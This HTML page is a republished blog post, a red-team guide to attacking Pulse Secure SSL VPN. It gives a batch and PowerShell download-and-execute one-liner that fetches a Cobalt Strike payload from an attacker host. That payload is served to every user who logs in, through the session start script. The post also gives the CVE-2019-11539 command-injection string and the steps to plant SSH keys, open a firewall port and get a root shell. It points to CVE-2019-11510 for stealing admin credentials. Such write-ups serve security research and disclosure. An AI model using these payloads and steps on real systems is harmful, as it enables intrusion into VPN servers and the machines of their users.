<!DOCTYPE html>





<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.4.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.4.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Copy',
      copy_success: 'Copied',
      copy_failure: 'Copy failed'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="IntroductionThis write-up is the collective efforts of collaborating with varioushackers on exploring and furthering research that was presented byOrange Tsai (orange_8361) and MehChang (mehqq_) on at">
<meta name="keywords" content="vpn,red team">
<meta property="og:type" content="article">
<meta property="og:title" content="Red Teamer’s Guide to Pulse Secure SSL VPN">
<meta property="og:url" content="https://wisdark.github.io/2019/09/02/test/index.html">
<meta property="og:site_name" content="Atlantis Information Security Library">
<meta property="og:description" content="IntroductionThis write-up is the collective efforts of collaborating with varioushackers on exploring and furthering research that was presented byOrange Tsai (orange_8361) and MehChang (mehqq_) on at">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://miro.medium.com/max/60/1*qaTvfmH2cK90EpnDsOhH5w.png?q=20">
<meta property="og:image" content="https://miro.medium.com/max/1060/1*qaTvfmH2cK90EpnDsOhH5w.png">
<meta property="og:image" content="https://miro.medium.com/max/60/1*2OmScTLJPxIQya6bkOh1Rw.png?q=20">
<meta property="og:image" content="https://miro.medium.com/max/1920/1*2OmScTLJPxIQya6bkOh1Rw.png">
<meta property="og:image" content="https://miro.medium.com/max/60/1*hC3PdTODIVh86mlVckKdKA.png?q=20">
<meta property="og:image" content="https://miro.medium.com/max/856/1*hC3PdTODIVh86mlVckKdKA.png">
<meta property="og:image" content="https://miro.medium.com/max/60/1*r-Zv5ilCQW9XoFO3Jmk2ew.png?q=20">
<meta property="og:image" content="https://miro.medium.com/max/1204/1*r-Zv5ilCQW9XoFO3Jmk2ew.png">
<meta property="og:image" content="https://miro.medium.com/max/60/1*QaFGiURYZBWvLtXXcL0n2g.png?q=20">
<meta property="og:image" content="https://miro.medium.com/max/1655/1*QaFGiURYZBWvLtXXcL0n2g.png">
<meta property="og:image" content="https://miro.medium.com/max/60/1*XtyyuOCUU8RvIqxB75RgXw.png?q=20">
<meta property="og:image" content="https://miro.medium.com/max/1919/1*XtyyuOCUU8RvIqxB75RgXw.png">
<meta property="og:image" content="https://miro.medium.com/max/60/1*Gv0eaf-U9BBcJCJbSdD4Ag.png?q=20">
<meta property="og:image" content="https://miro.medium.com/max/636/1*Gv0eaf-U9BBcJCJbSdD4Ag.png">
<meta property="og:updated_time" content="2019-09-09T14:57:59.995Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Red Teamer’s Guide to Pulse Secure SSL VPN">
<meta name="twitter:description" content="IntroductionThis write-up is the collective efforts of collaborating with varioushackers on exploring and furthering research that was presented byOrange Tsai (orange_8361) and MehChang (mehqq_) on at">
<meta name="twitter:image" content="https://miro.medium.com/max/60/1*qaTvfmH2cK90EpnDsOhH5w.png?q=20">
  <link rel="canonical" href="https://wisdark.github.io/2019/09/02/test/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>Red Teamer’s Guide to Pulse Secure SSL VPN | Atlantis Information Security Library</title>
  <meta name="generator" content="Hexo 3.9.0">
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">
  <div class="container use-motion">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Atlantis Information Security Library</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      <article itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block post">
    <link itemprop="mainEntityOfPage" href="https://wisdark.github.io/2019/09/02/test/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="wiseer.fkdark">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Atlantis Information Security Library">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">Red Teamer’s Guide to Pulse Secure SSL VPN

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              
                
              

              <time title="Created: 2019-09-02 11:41:10" itemprop="dateCreated datePublished" datetime="2019-09-02T11:41:10+00:00">2019-09-02</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2019-09-09 14:57:59" itemprop="dateModified" datetime="2019-09-09T14:57:59+00:00">2019-09-09</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/vuln/" itemprop="url" rel="index"><span itemprop="name">vuln</span></a></span>

                
                
              
            </span>
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>This write-up is the collective efforts of collaborating with various<br>hackers on exploring and furthering research that was presented by<br>Orange Tsai (<a href="https://twitter.com/orange_8361" target="_blank" rel="noopener">orange_8361</a>) and Meh<br>Chang (<a href="https://twitter.com/mehqq_" target="_blank" rel="noopener">mehqq_</a>) on attacking Pulse Secure<br>SSL VPN. The research was conducted primarily by Alyssa Herrera<br>(<a href="https://twitter.com/Alyssa_Herrera_" target="_blank" rel="noopener">Alyssa_Herrera_</a>), Justin<br>Wagner (<a href="https://twitter.com/0xDezzy" target="_blank" rel="noopener">0xDezzy</a>), and Mimir<br>(<a href="https://twitter.com/XMPPwocky" target="_blank" rel="noopener">XMPPwocky</a>). We additionally got help<br>from Rich Warren (<a href="https://twitter.com/buffaloverflow" target="_blank" rel="noopener">buffaloverflow</a>)<br>for the automation of the exploit. We’ll be focusing on two topics,<br>primarily expanding capabilities of the initial proof of concept that<br>Orange Tsai demonstrated on file execution upon client log-in and<br>demonstrating how we can use CVE-2019–11539 to gain an SSH shell with<br>root privileges. In later blog post I’ll be discussing how Mimir, and I<br>were able to create a proof of concept for CVE-2019–11510 that was later<br>used to tbuild to an exploit module created by Justin Wagner.</p>
<h1 id="Abusing-the-log-on-script-feature-to-pop-shells"><a href="#Abusing-the-log-on-script-feature-to-pop-shells" class="headerlink" title="Abusing the log-on script feature to pop shells"></a><strong>Abusing the log-on script feature to pop shells</strong></h1><p>Pulse secure connect contains the functionality to allow an<br>administrator to setup user clients to automatically execute locally<br>hosted files upon the user logging in or out of their VPN instance.</p>
<p>This feature allows you to set a script to be executed, which is quite<br>appealing for red teamers or malicious actors. We initially tried to<br>abuse this functionality to execute args when executing power-shell, or<br>cmd though this didn’t work out. We later got the idea from<br><a href="https://twitter.com/XMPPwocky" target="_blank" rel="noopener">Mimir</a> to try UNC path to query an SMB<br>server to perform to the attack and this worked out for us.</p>
<p>Here’s what we did, we’d first setup an SMB server which can be done<br>with a quick google search. Then we’d host a batch file which would use<br>power-shell to query and execute our shell onto the target, we used a<br>cobaltstrike beacon.</p>
<p><img src="https://miro.medium.com/max/60/1*qaTvfmH2cK90EpnDsOhH5w.png?q=20" alt><img src="https://miro.medium.com/max/1060/1*qaTvfmH2cK90EpnDsOhH5w.png" alt></p>
<p>Code for the batch script</p>
<p>The code we used for the batch script is below.</p>
<pre><code>@echo off 
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))”</code></pre><p><img src="https://miro.medium.com/max/60/1*2OmScTLJPxIQya6bkOh1Rw.png?q=20" alt><img src="https://miro.medium.com/max/1920/1*2OmScTLJPxIQya6bkOh1Rw.png" alt></p>
<p>Setting up Cobalt Strike</p>
<p>Now on our pulse secure instance we’ll log in with our administrative<br>credentials. You’d be able to get this through exploiting CVE-2019–11510<br>to either grab the files that hold the session ID, clear-text<br>credentials or hashes which you can crack.<br>We will then navigate to users -&gt; user roles -&gt; VPN Tunneling<br>-&gt; Windows: Session start script.</p>
<p><img src="https://miro.medium.com/max/60/1*hC3PdTODIVh86mlVckKdKA.png?q=20" alt><img src="https://miro.medium.com/max/856/1*hC3PdTODIVh86mlVckKdKA.png" alt></p>
<p>Session Start script endpoint</p>
<p>From here we can input our UNC path for our SMB server that contains our<br>batch file which will query our shell and execute it. Should look like<br>the below image</p>
<p><img src="https://miro.medium.com/max/60/1*r-Zv5ilCQW9XoFO3Jmk2ew.png?q=20" alt><img src="https://miro.medium.com/max/1204/1*r-Zv5ilCQW9XoFO3Jmk2ew.png" alt></p>
<p>Modified session start script with our server</p>
<p>From here any users logging into the compromised vpn instance would have<br>our payload executed and subsequently giving access to that user’s<br>machine. We included screen captures alongside a video demonstration of<br>it as well</p>
<p><img src="https://miro.medium.com/max/60/1*QaFGiURYZBWvLtXXcL0n2g.png?q=20" alt><img src="https://miro.medium.com/max/1655/1*QaFGiURYZBWvLtXXcL0n2g.png" alt></p>
<p>User logged in</p>
<p><img src="https://miro.medium.com/max/60/1*XtyyuOCUU8RvIqxB75RgXw.png?q=20" alt><img src="https://miro.medium.com/max/1919/1*XtyyuOCUU8RvIqxB75RgXw.png" alt></p>
<p>Execution of our shell as soon as the user logs in.</p>
<p>Video demonstration of this exploit</p>
<h1 id="Owning-Pulse-secure-connect-with-CVE-2019–11539-to-gain-SSH-root-shell"><a href="#Owning-Pulse-secure-connect-with-CVE-2019–11539-to-gain-SSH-root-shell" class="headerlink" title="Owning Pulse secure connect with CVE-2019–11539 to gain SSH root shell."></a>Owning Pulse secure connect with CVE-2019–11539 to gain SSH root shell.</h1><p>Now for the fun part, how we were able to leverage a post-auth exploit<br>into gaining an SSH shell that has root privileges. As per the first<br>half, we already mentioned getting auth’ed into an un-patched pulse<br>isn’t hard so we’ll get into how we owned the box.</p>
<p>We discovered during our research that we had permissions to modify the<br>SSH keys and ssh key configurations along side the IP tables which would<br>allow us to seamlessly gain an SSH shell with root access.</p>
<p>For a quick refresh the post-auth command injection requires us to<br>submit the following command</p>
<pre><code>-r$x=”Our command”,system$x# 2&gt;/data/runtime/tmp/tt/setcookie.thtml.ttc &lt;</code></pre><p>To the tcp dump endpoint which can be found in Maintenance -&gt; trouble<br>shooting -&gt; TCP Dump.</p>
<p><img src="https://miro.medium.com/max/60/1*Gv0eaf-U9BBcJCJbSdD4Ag.png?q=20" alt><img src="https://miro.medium.com/max/636/1*Gv0eaf-U9BBcJCJbSdD4Ag.png" alt></p>
<p>Injection of our command — click start sniffing to submit</p>
<p>The page will give us an error but the command is processed then we’d<br>request <a href="https://your-server/dana-na/auth/setcookie.cgi" target="_blank" rel="noopener">https://your-server/dana-na/auth/setcookie.cgi</a> to execute the<br>command. We need to repeat this process every time we want to execute a<br>query to the server other wise our commands won’t be executed.</p>
<p>This escalation is targeted at modifying the box’s sshd configuration<br>and adding our own SSH key to the system thus granting the ability to<br>ssh in. We’re specifically targeting the authorized keys which is found<br>in the /.ssh/ and cloud_sshd_config which is found in the /etc/<br>folder. Authorized keys is the keys that are allowed to ssh into the<br>box, while the config sshd file is configuration file for the ssh<br>daemon.</p>
<p>Now to perform post exploitation to gain our ssh shell from here, is<br>fairly straight forward. First we’d cp cloud_sshd_config and<br>authorized keys with the .bak extension so we can have a back up copy of<br>the original files. You should make an sshd config file that will look<br>like this.</p>
<pre><code>Protocol 2
UsePrivilegeSeparation no
RSAAuthentication yes
PubkeyAuthentication yes
ClientAliveInterval 180
ListenAddress 0.0.0.0</code></pre><p>After this we’ll curl our own authorized_keys as well as the previously<br>described sshd config file to the tmp folder, since we made our backup<br>copies of the original files we can now safely move our own files to the<br>server and over write it. Curl’ing it from your own server and then<br>moving the file to the directories is the easiest method rather than<br>dealing with modifying it through the command injection.<br>From here we’d make a request to modify the IPtables to open the port,<br>this can be done through the following command</p>
<pre><code>iptables -A INPUT -p tcp — dport PORT -j ACCEPT</code></pre><p>To finalize our changes we need to restart the sshd-ive service to have<br>our modifications to take place.</p>
<pre><code>kill -SIGHUP $(pgrep -f “sshd-ive</code></pre><p>Once this is done we can now ssh into our now shelled box.</p>
<pre><code>ssh root@host -p6667</code></pre><p>This will give us a root ssh shell without needing further escalation.<br>As mentioned above this would take a bit of time to do manually since we<br>need to make two requests every time we’d want to fire a command. This<br>can be easily scripted out and we prepared a demonstration below to<br>showcase the ability to go from simple admin access to the Pulse Secure<br>SSL VPN to gaining root access to the server. We will additionally be<br>releasing our script to exploit this which can be found at<br><a href="https://github.com/0xDezzy/CVE-2019-11539" target="_blank" rel="noopener">https://github.com/0xDezzy/CVE-2019-11539</a></p>
<p>Automation of post exploitation using CVE-2019–11539</p>

    </div>

    
    
    
        
      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/vpn/" rel="tag"># vpn</a>
            
              <a href="/tags/red-team/" rel="tag"># red team</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2019/09/09/hello-world/" rel="prev" title="Hello World">
                  Hello World <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Introduction"><span class="nav-number">1.</span> <span class="nav-text">Introduction</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Abusing-the-log-on-script-feature-to-pop-shells"><span class="nav-number">2.</span> <span class="nav-text">Abusing the log-on script feature to pop shells</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Owning-Pulse-secure-connect-with-CVE-2019–11539-to-gain-SSH-root-shell"><span class="nav-number">3.</span> <span class="nav-text">Owning Pulse secure connect with CVE-2019–11539 to gain SSH root shell.</span></a></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">wiseer.fkdark</p>
  <div class="site-description" itemprop="description"></div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">2</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
        
        
          
        
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">categories</span>
        
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
        
        
          
        
          
        
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">tags</span>
        
      </div>
    
  </nav>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wiseer.fkdark</span>
</div>

        












        
      </div>
    </footer>
  </div>

  


  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.0"></script><script src="/js/motion.js?v=7.4.0"></script>
<script src="/js/schemes/muse.js?v=7.4.0"></script>
<script src="/js/next-boot.js?v=7.4.0"></script>



  





















  

  

  

</body>
</html>
